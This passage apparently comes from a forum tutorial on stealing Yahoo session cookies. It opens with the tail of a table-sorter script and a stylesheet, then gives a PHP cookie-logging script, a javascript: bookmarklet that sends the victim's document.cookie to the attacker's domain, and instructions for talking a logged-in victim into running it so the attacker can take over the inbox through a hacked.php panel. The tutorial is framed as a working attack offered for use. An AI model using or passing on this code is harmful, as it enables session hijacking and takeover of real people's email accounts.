        this.n=n; this.t; this.b; this.r; this.d; this.p; this.w; this.a=[]; this.l=0
    }
    sorter.prototype.init=function(t,f){
        this.t=document.getElementById(t);
        this.b=this.t.getElementsByTagName('tbody')[0];
        this.r=this.b.rows; var l=this.r.length;
        for(var i=0;i<l;i++){
            if(i==0){
                var c=this.r[i].cells; this.w=c.length;
                for(var x=0;x<this.w;x++){
                    if(c[x].className!='nosort'){
                        c[x].className='head';
                        c[x].onclick=new Function(this.n+'.work(this.cellIndex)')
                    }
                }
            }else{
                this.a[i-1]={}; this.l++;
            }
        }
        if(f!=null){
            var a=new Function(this.n+'.work('+f+')'); a()
        }
    }
    sorter.prototype.work=function(y){
        this.b=this.t.getElementsByTagName('tbody')[0]; this.r=this.b.rows;
        var x=this.r[0].cells[y],i;
        for(i=0;i<this.l;i++){
            this.a[i].o=i+1; var v=this.r[i+1].cells[y].firstChild;
            this.a[i].value=(v!=null)?v.nodeValue:''
        }
        for(i=0;i<this.w;i++){
            var c=this.r[0].cells[i];
            if(c.className!='nosort'){c.className='head'}
        }
        if(this.p==y){
            this.a.reverse(); x.className=(this.d)?'asc':'desc';
            this.d=(this.d)?false:true
        }else{
            this.p=y; this.a.sort(compare); x.className='asc'; this.d=false
        }
        var n=document.createElement('tbody');
        n.appendChild(this.r[0]);
        for(i=0;i<this.l;i++){
            var r=this.r[this.a[i].o-1].cloneNode(true);
            n.appendChild(r); r.className=(i%2==0)?'even':'odd'
        }
        this.t.replaceChild(n,this.b)
    }
    function compare(f,c){
        f=f.value,c=c.value;
        var i=parseFloat(f.replace(/(\$|\,)/g,'')),n=parseFloat(c.replace(/(\$|\,)/g,''));
        if(!isNaN(i)&&!isNaN(n)){f=i,c=n}
        return (f>c?1:(f<c?-1:0))
    }
    return{sorter:sorter}
}();

 c. Name this code as c.css

 
Code:
* {margin:0; padding:0}
body {font:10px Verdana,Arial}
#wrapper {width:825px; margin:30px auto}
#header    {width:100%; height:18px; background: repeat-x; text-align:left;}
.sortable {width:823px; border:1px solid white; border-bottom:none}
.sortable th {padding:4px 6px 6px; background:white; color:#fff; text-align:left; color:#ccc}
.sortable td {padding:2px 4px 4px; background:white; border-bottom:1px solid #ccc}

.sortable .head:hover, .sortable .desc:hover, .sortable .asc:hover {color:#fff}
.sortable .even td {background:green}
.sortable .odd td {background:#fff}

.links {
    color: white;
    text-decoration: none;
    text-align: right;
}

a {
    text-decoration: none;
    color: black;
        face: terminal;
}

d. Name this code as yahoo.php

 
Code:
<?php
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////


$redirect_to = 'http://yahoo.com';
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

if(!isset($_GET["ex"]) || empty($_GET["ex"]))  {
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$X44."\">";

} else {

$cookie = $_GET['ex'];
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$redirect_to."\">";
$Y = explode("Y=", $cookie); $Y = $Y[1];
$Y = explode(";", $Y); $Y = $Y[0];
$yid = explode("l=", $Y); $yid = $yid[1];
$yid = explode("/o", $yid); $yid = $yid[0];
$str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
$str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
$id = "";
for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};
if ($id != '') {
$rand = rand(0, 1000000);
$fcookie = "./cookies/".$id."_".$rand;
$fh = fopen($fcookie, 'w') or die("chmod???");
fwrite($fh, $cookie);
fclose($fh);
}
}
?>
e. and last create a folder and name it as cookies (just leave it as empty box..this is where cookies are being stored)

3. Now give this code to slave to run in his browser when he would be logged in to his/her yahoo account.

Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Note:Here is yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory or folder name as 'cookies'. And remember don't forget to change the code above (http://yourdomain.com) to your domain name as you signed up free web hosting.

When the slave runs the code in his browser, he would again redirect to his yahoo account.

5. Now open the hacked.php.
Url would be: http://yourdomain.com/hacked.php

And enter the password (Default password is scifix)

Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.
Now it doesn't matter if slave signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

good luck guys! anyway use english to indonesian translator to make you easy to understand.........

Disclaimer: I will not be liable for any loss,any physical injury or any lawsuit upon using this tutorial, use at your own risk ^_^